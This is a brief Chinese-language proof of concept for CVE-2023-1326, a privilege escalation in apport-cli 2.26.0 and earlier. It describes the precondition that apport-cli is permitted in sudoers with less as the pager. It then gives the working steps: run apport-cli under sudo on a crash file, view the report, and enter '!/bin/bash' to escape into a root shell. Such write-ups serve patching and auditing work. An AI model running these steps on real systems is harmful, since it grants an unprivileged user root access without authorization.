针对 apport-cli 2.26.0 中 CVE-2023–1326 的概念验证
此漏洞是 apport-cli 2.26.0 中的权限提升漏洞,与 CVE-2023–26604 类似,但仅在将 apport-cli 分配至 sudoers 中时有效:

在 apport-cli 2.26.0 及更早版本中发现了一个权限提升攻击,与 CVE-2023-26604 类似。如果系统被特殊配置为允许非特权用户运行 sudo apport-cli,且 less 被设置为分页器,同时终端大小可被设置:则本地攻击者可以提升权限。
sudo /usr/bin/apport-cli -c /var/crash/some_crash_file.crash
按 V (查看报告)
!/bin/bash
